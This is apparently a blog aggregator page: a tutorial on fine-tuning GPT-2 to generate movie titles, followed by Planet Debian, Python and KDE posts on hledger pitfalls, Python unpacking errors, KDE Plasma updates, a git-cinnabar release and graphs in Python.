Since its reveal in 2017 in the popular paper Attention Is All You Need (https://arxiv.org/abs/1706.03762), the Transformer quickly became the most popular model in NLP. The ability to process text in a non-sequential way (as opposed to RNNs) allowed for training of big models. The attention mechanism it introduced proved extremely useful in generalizing text.

Following the paper, several popular transformers surfaced, the most popular of which is GPT. GPT models are developed and trained by OpenAI, one of the leaders in AI research. The latest release of GPT is GPT-3, which has 175 billion parameters. The model was very advanced to the point where OpenAI chose not to open-source it. People can access it through an API after a signup process and a long queue.

However, GPT-2, their previous release is open-source and available on many deep learning frameworks.

In this exercise, we use Huggingface and PyTorch to fine-tune a GPT-2 model for movie name generation.

Overview:

  • Imports and Data Loading
  • Data Preprocessing
  • Setup and Training
  • Movie Name Generation
  • Model Saving and Loading
Imports and Data Loading

Please use pip install {library name} in order to install the libraries below if they are not installed. "transformers" is the Huggingface library.

In [2]:
import re
import pandas as pd
import numpy as np
import torch
from torch.utils.data import Dataset, DataLoader
from transformers import AutoTokenizer, AutoModelWithLMHead
import torch.optim as optim

We set the device to enable GPU processing.

In [3]:
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
device
Out[3]: device(type='cuda', index=0)

Data Preprocessing

In [5]:
movies_file = "movies.csv"

Since the file is in CSV format, we use pandas.read_csv() to read the file

In [7]:
raw_df = pd.read_csv(movies_file)
raw_df
Out[7]:
      movieId   title                                       genres
0     1         Toy Story (1995)                            Adventure|Animation|Children|Comedy|Fantasy
1     2         Jumanji (1995)                              Adventure|Children|Fantasy
2     3         Grumpier Old Men (1995)                     Comedy|Romance
3     4         Waiting to Exhale (1995)                    Comedy|Drama|Romance
4     5         Father of the Bride Part II (1995)          Comedy
...   ...       ...                                         ...
9737  193581    Black Butler: Book of the Atlantic (2017)   Action|Animation|Comedy|Fantasy
9738  193583    No Game No Life: Zero (2017)                Animation|Comedy|Fantasy
9739  193585    Flint (2017)                                Drama
9740  193587    Bungo Stray Dogs: Dead Apple (2018)         Action|Animation
9741  193609    Andrew Dice Clay: Dice Rules (1991)         Comedy

9742 rows × 3 columns

We can see that we have 9742 movie names in the title column. Since the other columns are not useful for us, we will only keep the title column.

In [29]:
movie_names = raw_df['title']
movie_names
Out[29]:
0                                Toy Story (1995)
1                                  Jumanji (1995)
2                         Grumpier Old Men (1995)
3                        Waiting to Exhale (1995)
4              Father of the Bride Part II (1995)
                          ...
9737    Black Butler: Book of the Atlantic (2017)
9738                 No Game No Life: Zero (2017)
9739                                 Flint (2017)
9740          Bungo Stray Dogs: Dead Apple (2018)
9741          Andrew Dice Clay: Dice Rules (1991)
Name: title, Length: 9742, dtype: object

As seen, the movie names all end with the release year. While it may be interesting to keep the years in the names and let the model output years for generated movies, we can safely assume it does not help the model in understanding movie names.

We remove them with a simple regex expression:

In [30]:
movie_list = list(movie_names)

In [31]:
def remove_year(name):
    return re.sub(r"\([0-9]+\)", "", name).strip()

In [32]:
movie_list = [remove_year(name) for name in movie_list]

The final movie list looks ready for training. Notice that we do not need to tokenize or process the text any further, since GPT-2 comes with its own tokenizer that handles text in the appropriate way.

In [34]: movie_list[:5] Out[34]: ['Toy Story', 'Jumanji', 'Grumpier Old Men', 'Waiting to Exhale', 'Father of the Bride Part II']

However, we still need fixed-length inputs. We use the average movie name length in words to pick a safe maximum length.

In [39]:
avg_length = sum([len(name.split()) for name in movie_list]) / len(movie_list)
avg_length
Out[39]: 3.2991172243892426

Since the average movie name length in words is 3.3, we can assume that a max length of 10 will cover most of the instances.

In [40]:
max_length = 10

Setup and Training

Before creating the dataset, we download the model and the tokenizer. We need the tokenizer in order to tokenize the data.

In [120]:
tokenizer = AutoTokenizer.from_pretrained("gpt2")
model = AutoModelWithLMHead.from_pretrained("gpt2")
/usr/local/lib/python3.7/dist-packages/transformers/models/auto/modeling_auto.py:698: FutureWarning: The class `AutoModelWithLMHead` is deprecated and will be removed in a future version. Please use `AutoModelForCausalLM` for causal language models, `AutoModelForMaskedLM` for masked language models and `AutoModelForSeq2SeqLM` for encoder-decoder models.
  FutureWarning,

We send the model to the device and initialize the optimizer.

In [121]:
model = model.to(device)

In [122]:
optimizer = optim.AdamW(model.parameters(), lr=3e-4)

According to the GPT-2 paper, to fine-tune the model, use a task designator.

For our purposes, the designator is simply "movie: ". This will be added to the beginning of every example.

To correctly pad and truncate the instances, we find the number of tokens used by this designator:

In [108]:
tokenizer.encode("movie: ")
Out[108]: [41364, 25, 220]

In [109]:
extra_length = len(tokenizer.encode("movie: "))

We create a simple dataset that extends the PyTorch Dataset class:

In [110]:
class MovieDataset(Dataset):
    def __init__(self, tokenizer, init_token, movie_titles, max_len):
        self.max_len = max_len
        self.tokenizer = tokenizer
        self.eos = self.tokenizer.eos_token
        self.eos_id = self.tokenizer.eos_token_id
        self.movies = movie_titles
        self.result = []

        for movie in self.movies:
            # Encode the text using tokenizer.encode(). We add EOS at the end
            tokenized = self.tokenizer.encode(init_token + movie + self.eos)
            # Padding/truncating the encoded sequence to max_len
            padded = self.pad_truncate(tokenized)
            # Creating a tensor and adding to the result
            self.result.append(torch.tensor(padded))

    def __len__(self):
        return len(self.result)

    def __getitem__(self, item):
        return self.result[item]

    def pad_truncate(self, name):
        name_length = len(name) - extra_length
        if name_length < self.max_len:
            difference = self.max_len - name_length
            result = name + [self.eos_id] * difference
        elif name_length > self.max_len:
            result = name[:self.max_len + 2] + [self.eos_id]
        else:
            result = name
        return result

Then, we create the dataset:

In [111]: dataset = MovieDataset(tokenizer, "movie: ", movie_list, max_length)

Using a batch_size of 32, we create the dataloader:

In [112]: dataloader = DataLoader(dataset, batch_size=32, shuffle=True, drop_last=True)

GPT-2 is capable of several tasks, including summarization, generation, and translation. To train for generation, we use the same input as the labels:

In [114]:
def train(model, optimizer, dl, epochs):
    for epoch in range(epochs):
        for idx, batch in enumerate(dl):
            with torch.set_grad_enabled(True):
                optimizer.zero_grad()
                batch = batch.to(device)
                output = model(batch, labels=batch)
                loss = output[0]
                loss.backward()
                optimizer.step()
                if idx % 50 == 0:
                    print("loss: %f, %d" % (loss, idx))

When training a language model, it is easy to overfit. This is because there is no clear evaluation metric. With most tasks, one can use cross-validation to guard against overfitting. For our purposes, we only use 2 epochs for training.

In [123]:
train(model=model, optimizer=optimizer, dl=dataloader, epochs=2)
loss: 9.313371, 0
loss: 2.283597, 50
loss: 1.748692, 100
loss: 2.109853, 150
loss: 1.902950, 200
loss: 2.051265, 250
loss: 2.213011, 300
loss: 1.370941, 0
loss: 1.346577, 50
loss: 1.278894, 100
loss: 1.373716, 150
loss: 1.419072, 200
loss: 1.505586, 250
loss: 1.493220, 300

The loss decreased consistently, which means that the model was learning.

Movie Name Generation

To verify the training, we generate 20 movie names that do not exist in the movie list.

The generation methodology is as follows:

  1. The task designator is initially fed into the model
  2. A choice is selected from the top-k choices. A common question is why not always use the highest-ranked choice. The simple answer is that introducing randomness helps the model create different outputs. There are several sampling methods in the literature, such as top-k and nucleus sampling. In this example, we use top-k, where k = 9. k is a hyperparameter that can be tuned to improve performance. Feel free to play around with it to see the effects.
  3. The choice is added to the sequence and the current sequence is fed to the model.
  4. Repeat steps 2 and 3 until either max_len is achieved or the EOS token is generated.
In [116]:
def topk(probs, n=9):
    # The scores are initially softmaxed to convert to probabilities
    probs = torch.softmax(probs, dim=-1)

    # PyTorch has its own topk method, which we use here
    tokensProb, topIx = torch.topk(probs, k=n)

    # The new selection pool (9 choices) is normalized
    tokensProb = tokensProb / torch.sum(tokensProb)

    # Send to CPU for numpy handling
    tokensProb = tokensProb.cpu().detach().numpy()

    # Make a random choice from the pool based on the new prob distribution
    choice = np.random.choice(n, 1, p=tokensProb)
    tokenId = topIx[choice][0]
    return int(tokenId)

In [125]:
def model_infer(model, tokenizer, init_token, max_length=10):
    # Preprocess the init token (task designator)
    init_id = tokenizer.encode(init_token)
    result = init_id
    init_input = torch.tensor(init_id).unsqueeze(0).to(device)

    with torch.set_grad_enabled(False):
        # Feed the init token to the model
        output = model(init_input)

        # Flatten the logits at the final time step
        logits = output.logits[0, -1]

        # Make a top-k choice and append to the result
        result.append(topk(logits))

        # For max_length times:
        for i in range(max_length):
            # Feed the current sequence to the model and make a choice
            input = torch.tensor(result).unsqueeze(0).to(device)
            output = model(input)
            logits = output.logits[0, -1]
            res_id = topk(logits)

            # If the chosen token is EOS, return the result
            if res_id == tokenizer.eos_token_id:
                return tokenizer.decode(result)
            else:
                # Append to the sequence
                result.append(res_id)

    # If no EOS is generated, return after the max_len
    return tokenizer.decode(result)

Generating 20 unique movie names:

In [131]:
results = set()
while len(results) < 20:
    name = model_infer(model, tokenizer, "movie:").replace("movie: ", "").strip()
    if name not in movie_list:
        results.add(name)
        print(name)

The Final Days
American Psycho II
The Last Christmas
Last Kiss, The (Koumashi-
American Pie Presents: The Last Christmas
American Psycho II
My Best Fiend
The Final Cut
Last Summer
Last Night's Night
I Love You, I Love You
My Best Fiend
American Pie Presents: American Pie 2
I'm Sorry I Feel That Way
American Pie Presents: The Next Door, The (
Last Summer, The
I'll Do Anything... Any...
My Girl the Hero
My Best Fiend (La vie en f
The Man with the Golden Arm
The Last Train Home
I'm Here To Help

As shown, the movie names look realistic, meaning that the model learned how to generate movie names correctly.

Model Saving and Loading

PyTorch makes it very easy to save the model:

In [ ]: torch.save(model.state_dict(), "movie_gpt.pth")

And, if you need to load the model in the future for quick inference without having to train:

In [ ]: model.load_state_dict(torch.load("movie_gpt.pth"))

In this tutorial, we learnt how to fine-tune the Huggingface GPT model to perform movie name generation. The same methodology can be applied to any language model available on https://huggingface.co/models


Jonathan Dowland: hledger footguns

Planet Debian - Sat, 2021-11-20 16:03

I wrote in budgeting tools that I was taking a look at Plain Text Accounting and in particular, hledger. The jury's still out on the tools, but in the time I've been looking at them I've come across a couple of foot-guns I thought it was worth writing down.

hledger's ledger format is derived from that of its predecessor ledger, and so some of the problems might be inherited.

1. significant white space delimiters

The basic syntax for a transaction looks like this

2020-03-15 client payment
    assets:checking       $ 2000
    income:consulting     $-2000

There are some significant white space delimiters in play. The most subtle is what separates the account names from the values: it is two or more spaces. With a single space, the value is treated as part of the account name. For some reason I hit this frequently when trying to encode opening balances: the account name used as the source of the initial balances is something not otherwise generally referred to again (something like equity:opening balances), and the transaction amount is inferred where possible, so I ended up with a bunch of accounts named equity:opening balances £100 and similar.
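To make the pitfall concrete, here is a sketch (a hypothetical journal, not taken from my real file): the first posting uses two spaces before the amount and parses as intended, while the second uses a single space, so the whole line becomes one account literally named equity:opening balances £100, with its amount left to be inferred:

```
2020-01-01 opening balances
    assets:checking  £100
    equity:opening balances £100
```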

2. flexible decimal delimiter

The value of transactions can be interspersed with commas and periods to make it more readable: e.g. $2000 could be written as $2,000. Different locales have different conventions here: It seems some(/most/all?) of Europe use periods to separate out the units and a comma to delimit the fractional part, whereas the US and the UK do the opposite. There is no built-in association between the currency symbol you are using and the period/comma convention: it's quite possible to accidentally write a number which is interpreted differently to how you intended, and it doesn't matter if you are using $ or £ etc.
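As an illustration (a hypothetical entry; how a given hledger version actually reads it depends on its decimal-mark inference and any commodity directives in effect), the amount below is fifteen hundred pounds under the UK convention, but one and a half pounds if the comma is taken as the decimal mark:

```
2020-03-15 rent
    expenses:rent  £1,500
    assets:checking
```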

3. new syntax has unexpected results in old versions

Finally, my favourite. hledger has a notion of rules that can be used to match transactions when importing from CSV. The format looks like this:

if (match rule)
& (another rule)
    account1 some:account:from
    account2 some:account:to

By default, multiple rules in sequence like above are OR'd: any of them can match. The & prefix switches the behaviour to AND. But, & is a relatively new addition: it's not supported in 1.18.1, the version in Debian stable, which upstream released in June 2020. In prior versions the & prefix is not a syntax error, or at least, not one that's reported: it's silently ignored; meaning, the line with the & does nothing, and any of the other rules in the set will match. This is easy to miss, and means imports could be incorrectly posted.


Andre Roberge: Friendly-traceback en español

Planet Python - Sat, 2021-11-20 10:00

Friendly and Friendly-traceback are now partially available in Spanish thanks to the work of Martín René (https://github.com/martinvilu).

You can have a look at the Spanish translations in context for SyntaxErrors and for other exceptions.

If you are interested in contributing to translations, please join this discussion and have a look at this online collaborative site.


Update: Someone just volunteered to help with the Italian translation. Note that there are more than 600 pieces of text to translate and that more volunteers can help!


ItsMyCode: ValueError: too many values to unpack (expected 2)

Planet Python - Sat, 2021-11-20 08:54


If you get ValueError: too many values to unpack (expected 2), it means that you are trying to unpack more values from an iterable than you have variables to receive them. ValueError is a standard exception that can occur if a method receives an argument of the correct data type but with an invalid value, or with a value that falls outside the valid range.

In this article, let us look at what this error means and the scenarios you get this error and how to resolve the error with examples.

What is Unpacking in Python?

In Python, a function can return multiple values, and they can be stored in variables. This is one of the distinctive features of Python compared to other languages such as C++, Java, and C#.

Unpacking in Python is an operation where an iterable of values will be assigned to a tuple or list of variables.

Unpacking using List in Python

In this example, we are unpacking the list of elements where each element that we return from the list should assign to a variable on the left-hand side to store these elements.

x,y,z = [5,10,15]
print(x)
print(y)
print(z)

Output

5
10
15

Unpacking list using underscore

The underscore is most commonly used to ignore values: _ is used as a variable name when we do not intend to use the value at a later point.

x,y,_ = [5,10,15]
print(x)
print(y)
print(_)

Output

5
10
15

Unpacking list using an asterisk

The drawback of the underscore is that it holds just one value, but what if you have many values that arrive dynamically? The asterisk comes to the rescue here. We can prefix a variable with an asterisk to unpack all the values that are not otherwise assigned, and it will hold all these elements.

x,y, *z = [5,10,15,20,25,30]
print(x)
print(y)
print(z)

Output

5
10
[15, 20, 25, 30]

What is ValueError: too many values to unpack (expected 2)?

ValueError: too many values to unpack (expected 2) occurs when there is a mismatch between the number of returned values and the number of variables declared to store them. If there are more objects to assign than variables to hold them, you get a ValueError.

The error occurs mainly in 2 scenarios-

Scenario 1: Unpacking the list elements

Let’s take a simple example where the list holds three items but there are only two variables on the left-hand side to receive them; Python will throw ValueError: too many values to unpack.

In the below example, we have two variables, x and y, but we are unpacking three elements from the list.

Error Scenario

x,y =[5,10,15]

Output

Traceback (most recent call last):
  File "c:/Projects/Tryouts/main.py", line 1, in <module>
    x,y =[5,10,15]
ValueError: too many values to unpack (expected 2)

Solution

While unpacking a list into variables, the number of variables you want to unpack must equal the number of items in the list. 

If you already know the number of elements in the list, then ensure you have an equal number of variables on the left-hand side to hold them.

If you do not know the number of elements in the list, or if your list is dynamic, then you can unpack the list with the asterisk operator. It ensures that all the unassigned elements are stored in a single variable.

# In case we know the number of elements
# in the list to unpack
x,y,z =[5,10,15]
print("If we know the number of elements in list")
print(x)
print(y)
print(z)

# if the list is dynamic
a,b, *c = [5,10,15,20,25,30]
print("In case of dynamic list")
print(a)
print(b)
print(c)

Output

If we know the number of elements in list
5
10
15
In case of dynamic list
5
10
[15, 20, 25, 30]

Scenario 2: Unpacking dictionary

In Python, a dictionary is an unordered collection of items holding key-value pairs. Let us consider a simple example of an employee dictionary, which consists of three keys, each holding a value, as shown below.

If we need to extract and print each of the key-value pairs in the employee dictionary, we can iterate over the dictionary elements using a for loop.

Let's run our code and see what happens.

Error Scenarios

# Unpacking using dictionary
employee= {
    "name":"Chandler",
    "age":25,
    "Salary":10000
}
for keys, values in employee:
    print(keys,values)

Output

Traceback (most recent call last):
  File "c:/Projects/Tryouts/main.py", line 9, in <module>
    for keys, values in employee:
ValueError: too many values to unpack (expected 2)

We get a ValueError in the above code because iterating over a dictionary directly yields only its keys, not key-value pairs. Each key here is a string, and unpacking a string of more than two characters into two variables is what raises the error.
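A quick sketch makes this concrete: the loop receives the keys one by one, and Python then tries to unpack each key string character by character:

```python
employee = {"name": "Chandler", "age": 25, "Salary": 10000}

# Iterating a dictionary directly yields only its keys
print(list(employee))  # → ['name', 'age', 'Salary']

# A two-character string happily unpacks into two variables...
a, b = "na"
print(a, b)  # → n a

# ...but "name" has four characters, so `keys, values = "name"` raises
# ValueError: too many values to unpack (expected 2)
```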

Solution

We can resolve the error by using the items() method. The items() function returns a view object containing the key-value pairs stored as tuples.

# Unpacking using dictionary
employee= {
    "name":"Chandler",
    "age":25,
    "Salary":10000
}
for keys, values in employee.items():
    print(keys,values)

Output

name Chandler
age 25
Salary 10000

Note: If you are using Python 2.x, you need to use iteritems() instead of the items() function. 

The post ValueError: too many values to unpack (expected 2) appeared first on ItsMyCode.


This week in KDE: most of GNOME shell in the Overview effect

Planet KDE - Fri, 2021-11-19 23:11

This week the new KWin Overview effect gained the ability to show results from KRunner when you search! This brings it fairly close to feature parity with GNOME’s central Activities Overview feature!

At this rate, we’re about halfway to implementing all of GNOME shell in the Overview effect.

Thanks to Vlad Zahorodnii for this work, which lands in Plasma 5.24!

Other new Features

Gwenview now has “Print Preview” functionality, which as I’m sure you can imagine would be quite useful in an image viewer app (Alexander Volkov, Gwenview 22.04)

Discover now prevents you from doing anything that would uninstall Plasma in the process, which is probably not what you were intending to do (Aleix Pol Gonzalez, Plasma 5.24):

Hopefully this is Linus-Sebastian-proof

Bugfixes & Performance Improvements

When you print an image in Gwenview or Kolourpaint, it now automatically defaults to printing in portrait or landscape mode according to the image’s aspect ratio, rather than making you set this manually (Alexander Volkov, Gwenview 21.12)

Konsole now releases memory when you clear the text (Martin Tobias Holmedahl Sandsmark, Konsole 22.04)

Konsole now has better text display performance (Waqar Ahmed and Tomaz Canabrava, Konsole 22.04)

The Alacritty terminal once again opens with the correct window size (Vlad Zahorodnii, Plasma 5.23.4)

Toolbar buttons in GTK3 apps that don’t use CSD headerbars (such as Inkscape and FileZilla) no longer have unnecessary borders drawn around them (Yaroslav Sidlovsky, Plasma 5.23.4)

The open/save dialogs in Flatpak or Snap apps now remember their previous size when re-opened (Eugene Popov, Plasma 5.23.4)

The “Show in file manager” text in Plasma Vaults is now able to be translated (Nicolas Fella, Plasma 5.23.4)

The Task Manager’s textual list of grouped apps is now much faster and more performant (Fushan Wen, Plasma 5.24)

Discover now eventually stops searching after no further search results are found, instead of always displaying “Still looking” at the bottom (Aleix Pol Gonzalez, Plasma 5.24)

Fixed an issue with playing certain embedded videos in the Plasma Wayland session (Vlad Zahorodnii, Plasma 5.24)

Fixed a major performance issue in QtQuick-based KWin effects for NVIDIA GPU users (David Edmundson, Plasma 5.24)

The new Overview effect is now much faster to activate (Vlad Zahorodnii, Plasma 5.24)

Tons and tons of small bugs with Breeze icons have been fixed–too many to individually list! (Andreas Kainz, Frameworks 5.89)

Fixed a visual glitch with Plasma tooltips flickering when they appear or disappear (Marco Martin, Frameworks 5.89)

Icons and text in Plasma applet tabs are once again centered as intended (Eugene Popov, Frameworks 5.89)

User Interface Improvements

Elisa’s default album icon is now prettier and more semantically appropriate (Andreas Kainz, Elisa 22.04):

The new Overview effect is now touch-friendly (Arjen Hiemstra, Plasma 5.24)

The touchpad applet has been restored after getting removed in Plasma 5.23, and is now back as a read-only status notifier that simply shows visually when the touchpad is disabled, like the caps lock and microphone notifier applets (me: Nate Graham, Plasma 5.23.4):

The weather applet’s location configuration dialog now automatically searches through all available weather sources rather than making you first select some manually (Bharadwaj Raju, Plasma 5.24):

Discover now presents a more user-friendly set of messages when there is an issue installing updates (me: Nate Graham, Plasma 5.24):

This is a simulated error message, of course. But it’s what a normal error message seems like to regular people!

Discover’s search field no longer auto-accepts a few seconds after you stop typing; now it only initiates a search when you explicitly hit the Enter or Return key (me: Nate Graham, Plasma 5.24)

Opening a Plasma Vault and displaying its contents in your file manager now creates a new file manager window for this purpose instead of re-using any existing ones, since this didn’t work with various combinations of activities and virtual desktops and especially when using the “Limit to the selected activities” setting (Ivan Čukić, Plasma 5.24)

…And everything else

Keep in mind that this blog only covers the tip of the iceberg! Tons of KDE apps whose development I don’t have time to follow aren’t represented here, and I also don’t mention backend refactoring, improved test coverage, and other changes that are generally not user-facing. If you’re hungry for more, check out https://planet.kde.org/, where you can find blog posts by other KDE contributors detailing the work they’re doing.

How You Can Help

Have a look at https://community.kde.org/Get_Involved to discover ways to be part of a project that really matters. Each contributor makes a huge difference in KDE; you are not a number or a cog in a machine! You don’t have to already be a programmer, either. I wasn’t when I got started. Try it, you’ll like it! We don’t bite!

Finally, consider making a tax-deductible donation to the KDE e.V. foundation.


Mike Hommey: Announcing git-cinnabar 0.5.8

Planet Debian - Fri, 2021-11-19 17:05

Git-cinnabar is a git remote helper to interact with Mercurial repositories. It allows you to clone, pull and push from/to Mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.7?
  • Updated git to 2.34.0 for the helper.
  • Python 3.5 and newer are now officially supported. Git-cinnabar will try to use the python3 program by default, but will fallback to python2.7 if that’s where the Mercurial libraries are available. It is possible to pick a specific python with the GIT_CINNABAR_PYTHON environment variable.
  • Fixed compatibility with Mercurial 5.8 and newer.
  • The prebuilt binaries are now optimized on arm64 macOS and Windows.
  • git cinnabar download now properly returns an error code when failing to extract the prebuilt binaries.
  • Pushing to a non-empty Mercurial repository without having pulled at least once from it is now prevented.
  • Replaced the nagging about fsck with a smaller check always happening after pulling.
  • Fail earlier on git fetch hg::url <sha1> (it would properly fetch the Mercurial changeset and its ancestors, but git would fail at the end because the sha1 is not a git sha1 ; use git cinnabar fetch instead)
  • Minor fixes.

Gunnar Wolf: For our millionth bug, bookworms eat raspberries alive

Planet Debian - Fri, 2021-11-19 10:37

I guess you already heard, right? The Debian Bug Tracking System has hit a big milestone! We just passed our one millionth bug report! (and yes, that’s a cause for celebration; bug reporting is probably the best way for the system to grow and improve)

So, to celebrate, I want to announce I have nudged our unofficial Raspberry Pi images build scripts to now also build images for our upcoming Debian release, Debian 12 «Bookworm»

(image above: A bookworm learns about raspberries in various stages of testing. Image sources: Transformers Wiki, CC BY-SA and Sam Saunders at Flickr, CC BY-SA)

So… Get’em while they are fresh! https://raspi.debian.net/! And enjoy the following (non-book)worm-on-a-raspberry picture from Wikimedia Commons:

Oh, FWIW – The site still shows images for Buster. You will notice they are no longer being autobuilt (why spend CPU time on something that’s no longer going to change significantly?). The Bookworm images are not yet tested; as soon as I can test them, I will drop the Buster ones.

Categories: FLOSS Project Planets

Python for Beginners: Graph in Python

Planet Python - Fri, 2021-11-19 09:26

Graphs are one of the most important data structures. Graphs are used to represent telephone networks, maps, social network connections, etc. In this article, we will discuss what a graph is and how we can implement a graph in Python.

What is a graph?

In mathematics, a graph is defined as a set of vertices and edges, where vertices are particular objects and edges represent the connections between the vertices. Both the vertices and the edges are represented using sets.

Mathematically, a graph G can be represented as G = (V, E), where V is the set of vertices and E is the set of edges.

If an edge Ei connects vertices v1 and v2, we can represent the edge as Ei = (v1, v2).

How to represent a graph?

We will use the graph given in the following figure to learn how to represent a graph.

Graph in Python

To represent a graph, we will have to find the set of vertices and edges in the graph. 

First, we will find the set of vertices. For this, we can create a set using the vertices given in the above figure. In the figure, the vertices have been named A, B, C, D, E, and F. So the set of vertices can be created as V = {A, B, C, D, E, F}.

To find the set of edges, first we will find all the edges in the graph. You can observe that there are 6 edges in the graph, numbered from E1 to E6. An edge Ei can be created as a tuple (v1, v2), where v1 and v2 are the vertices connected by Ei. For the above graph, we can represent the edges as follows.

  • E1 = (A, D)
  • E2 = (A, B)
  • E3 = (A, E)
  • E4 = (A, F)
  • E5 = (B, F)
  • E6 = (B, C)

The set of edges E can be represented as E = {E1, E2, E3, E4, E5, E6}.

Finally, the graph G can be represented as G = (V, E), where V and E are the sets of vertices and edges.

So far, we have discussed how to represent a graph mathematically. Can you think of a way to represent a graph in a Python program? Let us look into it.

How to represent a graph in Python?

We can represent a graph using an adjacency list. An adjacency list can be thought of as a list in which each vertex stores a list of all the vertices connected to it. 

We will implement the adjacency list representation of the graph in Python using a dictionary and lists.

First, we will create a Python dictionary with all the vertex names as keys and an empty list (the adjacency list) as each associated value, using the given set of vertices.

After that, we will use the given set of edges to complete the adjacency list of each vertex that has been represented using the keys of the dictionary. For every edge (v1, v2), we will add v1 to the adjacency list of v2 and v2 to the adjacency list of v1.

In this way, every key (vertex) in the dictionary will have an associated value (a list of vertices), and the dictionary will represent the whole graph in Python.

Given the set of vertices and edges, we can implement a graph in Python as follows.

vertices = {"A", "B", "C", "D", "E", "F"}
edges = {("A", "D"), ("A", "B"), ("A", "E"), ("A", "F"), ("B", "F"), ("B", "C")}
graph = dict()
for vertex in vertices:
    graph[vertex] = []
for edge in edges:
    v1 = edge[0]
    v2 = edge[1]
    graph[v1].append(v2)
    graph[v2].append(v1)
print("The given set of vertices is:", vertices)
print("The given set of edges is:", edges)
print("Graph representation in python is:")
print(graph)

Output:

The given set of vertices is: {'F', 'D', 'B', 'E', 'A', 'C'}
The given set of edges is: {('A', 'F'), ('A', 'B'), ('B', 'C'), ('A', 'D'), ('A', 'E'), ('B', 'F')}
Graph representation in python is:
{'F': ['A', 'B'], 'D': ['A'], 'B': ['A', 'C', 'F'], 'E': ['A'], 'A': ['F', 'B', 'D', 'E'], 'C': ['B']}

In the above output, you can verify that each key of the graph has a list of vertices that are connected to it as its value.
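Once the graph is built, the adjacency list makes traversals straightforward. As a quick sketch (not part of the original code above), here is a breadth-first traversal over the same example graph; the graph dictionary is rebuilt inline so the snippet is self-contained, and the bfs helper name is our own illustration. Neighbours are visited in sorted order so the result is deterministic, since the adjacency lists built from a set of edges can come out in any order.

```python
from collections import deque

# Adjacency list for the example graph from the article,
# rebuilt here so this snippet is self-contained.
graph = {
    "A": ["B", "D", "E", "F"],
    "B": ["A", "C", "F"],
    "C": ["B"],
    "D": ["A"],
    "E": ["A"],
    "F": ["A", "B"],
}

def bfs(graph, start):
    """Return the vertices reachable from start, in breadth-first order."""
    visited = [start]
    queue = deque([start])
    while queue:
        vertex = queue.popleft()
        # Sort neighbours so the traversal order is deterministic.
        for neighbour in sorted(graph[vertex]):
            if neighbour not in visited:
                visited.append(neighbour)
                queue.append(neighbour)
    return visited

print(bfs(graph, "A"))  # ['A', 'B', 'D', 'E', 'F', 'C']
```

Starting from A, all of A's neighbours are visited first (B, D, E, F), and only then C, which is two edges away, which is exactly the level-by-level behaviour breadth-first search is meant to have.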

Conclusion

In this article, we have discussed the graph data structure. We also discussed the mathematical representation of a graph and how we can implement it in Python. To learn more about data structures in Python, you can read this article on Linked list in Python.

The post Graph in Python appeared first on PythonForBeginners.com.

Categories: FLOSS Project Planets

Pages